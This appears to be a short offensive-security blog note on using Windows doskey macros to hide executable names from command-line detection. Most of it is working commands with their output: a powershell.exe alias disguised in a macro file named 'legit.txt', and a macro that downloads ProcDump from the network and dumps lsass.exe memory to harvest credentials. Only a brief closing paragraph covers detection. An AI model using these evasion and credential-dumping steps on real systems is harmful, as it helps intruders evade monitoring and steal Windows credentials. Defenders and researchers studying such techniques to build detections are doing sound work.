doskey
the doskey command can be used to evade some command-line detection rules by hidding the executable name behind an alias.
You can define and use a macro as such:
C:\Users\Target> doskey test1="%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" $*
C:\Users\Target> test1 gci c:\
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 01/10/2022 14:37 Intel
d----- 07/05/2022 07:24 PerfLogs
d-r--- 09/10/2022 09:14 Program Files
d-r--- 03/10/2022 09:33 Program Files (x86)
d-r--- 01/10/2022 14:13 Users
d----- 13/10/2022 08:36 Windows
Clearly, any good detection rule will still catch the “powershell.exe” during macro definition but you can import macros from a file so that it will not appear on the command-line.
Define and save the macros to a file:
C:\Users\Attacker> doskey test1="%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" $*
C:\Users\Attacker> doskey /m > legit.txt
Transfer the file to the target and load it:
C:\Users\Target> doskey /macrofile=legit.txt
C:\Users\Target> test1 cgi c:\
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 01/10/2022 14:37 Intel
d----- 07/05/2022 07:24 PerfLogs
d-r--- 09/10/2022 09:14 Program Files
d-r--- 03/10/2022 09:33 Program Files (x86)
d-r--- 01/10/2022 14:13 Users
d----- 13/10/2022 08:36 Windows
Another example (needs admin rights):
C:\Users\Attacker> doskey test2=powershell (New-Object System.Net.Webclient).DownloadFile('https://download.sysinternals.com/files/Procdump.zip', 'test.zip'); Expand-Archive test.zip -DestinationPath test -Force; test/procdump.exe -accepteula -ma lsass.exe lsass.dmp
C:\Users\Attacker> doskey /m > legit.txt
On target:
C:\Windows\System32> doskey /macrofile=legit.txt
C:\Windows\System32> test2
ProcDump v10.11 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[11:03:53] Dump 1 initiated: C:\Windows\System32\lsass.dmp
[11:03:54] Dump 1 writing: Estimated dump file size is 65 MB.
[11:03:54] Dump 1 complete: 65 MB written in 1.0 seconds
[11:03:55] Dump count reached.
You can also chain commands in macro definition with $t
:
doskey tx=cd temp$tdir /w $*
And change the default executable (cmd.exe) used for resolving macros:
doskey /exename=ftp.exe go=open 172.27.1.100$tmget *.TXT c:\reports$tbye
Detection
This will not work on detection hooks that are at a lower level than command-line history though and you will left an artifact containing the aliases definition.
I do not know to which extent “doskey” is still used on Windows systems as of today. I would suggest checking the occurences of execution of that binary on a SIEM for example and if not frequently used, create a detection rule on its execution.